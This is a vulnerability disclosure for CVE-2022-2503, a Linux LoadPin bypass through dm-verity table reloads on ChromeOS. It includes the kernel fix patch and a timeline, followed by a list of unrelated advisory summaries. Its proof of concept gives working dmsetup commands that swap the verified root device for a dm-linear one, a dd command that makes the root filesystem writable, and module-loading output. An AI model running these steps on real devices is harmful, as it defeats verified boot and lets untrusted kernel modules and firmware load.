Headline
CVE-2022-2503: Linux: LoadPin bypass via dm-verity table reload
Dm-verity is used for extending root-of-trust to root filesystems. LoadPin builds on this property to restrict module/firmware loads to just the trusted root filesystem. Device-mapper table reloads currently allow users with root privileges to switch out the target with an equivalent dm-linear target and bypass verification till reboot. This allows root to bypass LoadPin and can be used to load untrusted and unverified kernel modules and firmware, which implies arbitrary kernel execution and persistence for peripherals that do not verify firmware updates. We recommend upgrading past commit 4caae58406f8ceb741603eee460d79bacca9b1b5
Summary
Dm-verity is used for extending root-of-trust to root filesystems for several distributions, including ChromeOS, Container-Optimized OS and Android. LoadPin builds on this property to restrict module/firmware loads to just the trusted root filesystem. Device-mapper table reloads currently allow users with root privileges to switch out the target with an equivalent dm-linear target and bypass verification till reboot. This allows root to bypass LoadPin and can be used to load untrusted and unverified kernel modules and firmware, which implies arbitrary kernel execution and persistence for peripherals that do not verify firmware updates.
Severity
High - while the attack vector has a high barrier of entry (access to root shell), the resulting constructs allow the attacker to take a trusted read-only root filesystem and arbitrarily modify it at will for the remainder of the boot. By extension, this breaks down any guarantees built on the assumption that “verified root filesystem = trusted content”: an example of this is LoadPin, which trusts verified root filesystems. Absent a mechanism to modify the boot process, subsequent reboots will fail since an attempt to set up a dm-verity device on top of the modified filesystem will fail verification.
Proof of Concept
Precondition: This specific attack scenario is gated on the user getting access to a root shell. Alternately, attackers that can leverage existing usages of dmsetup (eg. cryptohome in ChromeOS) to run arbitrary device mapper commands can lower the barrier to entry.
Setup: Any ChromeOS device running with rootfs verification. To simplify showcasing the exploit mechanism, we use a dev mode device with rootfs verification enabled, which already gives us access to a root shell.
On ChromeOS, the root device is named vroot. dmsetup table on a device shows the exact parameters of the target, although the attacker can figure out the parameters based on the device’s storage configuration.
$ dmsetup table
vroot 0 <size> verity.... <root_device>
… other devices
The following set of commands result in an in-line replacement of the verity device with an equivalent dm-linear device:
$ dmsetup suspend vroot
$ dmsetup reload vroot --table "0 <size> linear <root_device> 0"
$ dmsetup resume vroot
This allows subsequent reads into vroot to bypass the verification. This also allows attackers that can in-place modify the dm-linear device to (1) write extents to existing files beneath the filesystem if it is a true read-only filesystem (eg. squashfs, erofs) or (2) remount the filesystem as rw and add files to it.
Note: on ChromeOS, the build scripts use a hack to mark the root filesystem as read only (set unsupported feature flags). That can be undone using:
ro_compat_offset=$((0x464 + 3)) # Set 'highest' byte
printf '\000' |
sudo dd of=/dev/mapper/vroot seek=${ro_compat_offset} \
conv=notrunc count=1 bs=1 2>/dev/null
mount -o rw,remount /
Since the mnt_id/superblock for the filesystem hasn’t changed, LoadPin assumes that the module is still being read off of a verified filesystem.
The attacker can now attempt to load a custom kernel module (for illustration, we use an externally compiled lzo kernel module); normally, LoadPin will deny insmods from any non-root filesystem:
localhost ~ # insmod /tmp/abcd.ko.gz
insmod: ERROR: could not insert module /tmp/abcd.ko.gz: Operation not permitted
localhost ~ # dmesg | tail
…
[ 765.974284] LoadPin: kernel-module denied obj="/tmp/abcd.ko.gz" pid=7105 cmdline="insmod /tmp/abcd.ko.gz"
In contrast, attempting to copy the module over to the root filesystem and then using insmod successfully bypasses LoadPin. The load fails only because lzo determines a version mismatch (which can be trivially overridden).
localhost ~ # insmod /lib/modules/abcd.ko.gz
insmod: ERROR: could not insert module /lib/modules/abcd.ko.gz: Invalid module format
localhost ~ # dmesg | tail
…
[ 620.335762] lzo: version magic '5.10.117 SMP preempt mod_unload ' should be '5.10.117-16074-ge03ffab7384c SMP preempt mod_unload '
Further Analysis
The device-mapper framework provides a mechanism to mark targets as immutable (and hence fail table reloads that try to change the target type). The following patch marks dm-verity targets as immutable:
diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
index 065d7d3ff026..55a410b2880e 100644
--- a/drivers/md/dm-verity-target.c
+++ b/drivers/md/dm-verity-target.c
@@ -1584,6 +1584,7 @@ static int verity_ctr(struct dm_target *ti, unsigned argc, char **argv)
static struct target_type verity_target = {
.name = "verity",
+ .features = DM_TARGET_IMMUTABLE,
.version = {1, 8, 0},
.module = THIS_MODULE,
.ctr = verity_ctr,
Subsequent attempts to replace verity with another target fail with:
> [ 124.755083] device-mapper: ioctl: can't replace immutable target type verity
While reloads with the type verity still succeed (which might be a mechanism to change the error handling to “none” and hence bypass the verification), such commands only succeed in read-only mode (which implies that the device-mapper table will not be modified).
Timeline
Date reported:5/26/2022
Date fixed: 6/01/2022
Date disclosed: 7/11/2022
Related news
Red Hat Security Advisory 2023-5627-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass, null pointer, out of bounds write, and use-after-free vulnerabilities.
Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.
Ubuntu Security Notice 6014-1 - Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP implementation in the Linux kernel did not properly handle IPID assignment. A remote attacker could use this to cause a denial of service or inject forged data. Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk, Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre Variant 2 mitigations for AMD processors on Linux were insufficient in some situations. A local attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 6013-1 - Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP implementation in the Linux kernel did not properly handle IPID assignment. A remote attacker could use this to cause a denial of service or inject forged data. Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk, Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre Variant 2 mitigations for AMD processors on Linux were insufficient in some situations. A local attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 6001-1 - Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP implementation in the Linux kernel did not properly handle IPID assignment. A remote attacker could use this to cause a denial of service or inject forged data. Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk, Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre Variant 2 mitigations for AMD processors on Linux were insufficient in some situations. A local attacker could possibly use this to expose sensitive information.
OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have an Out-of-bound memory read and write vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could read out-of-bound memory leading sensitive to information disclosure. The processes with system user UID run on the device would be able to write out-of-bound memory which could lead to unspecified memory corruption.
Ubuntu Security Notice 5660-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5654-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5647-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5639-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5630-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5623-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.
Ubuntu Security Notice 5622-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5616-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. Moshe Kol, Amit Klein and Yossi Gilad discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5602-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5599-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.
Ubuntu Security Notice 5594-1 - Asaf Modelevsky discovered that the Intel 10GbE PCI Express Ethernet driver for the Linux kernel performed insufficient control flow management. A local attacker could possibly use this to cause a denial of service. It was discovered that the IP implementation in the Linux kernel did not provide sufficient randomization when calculating port offsets. An attacker could possibly use this to expose sensitive information.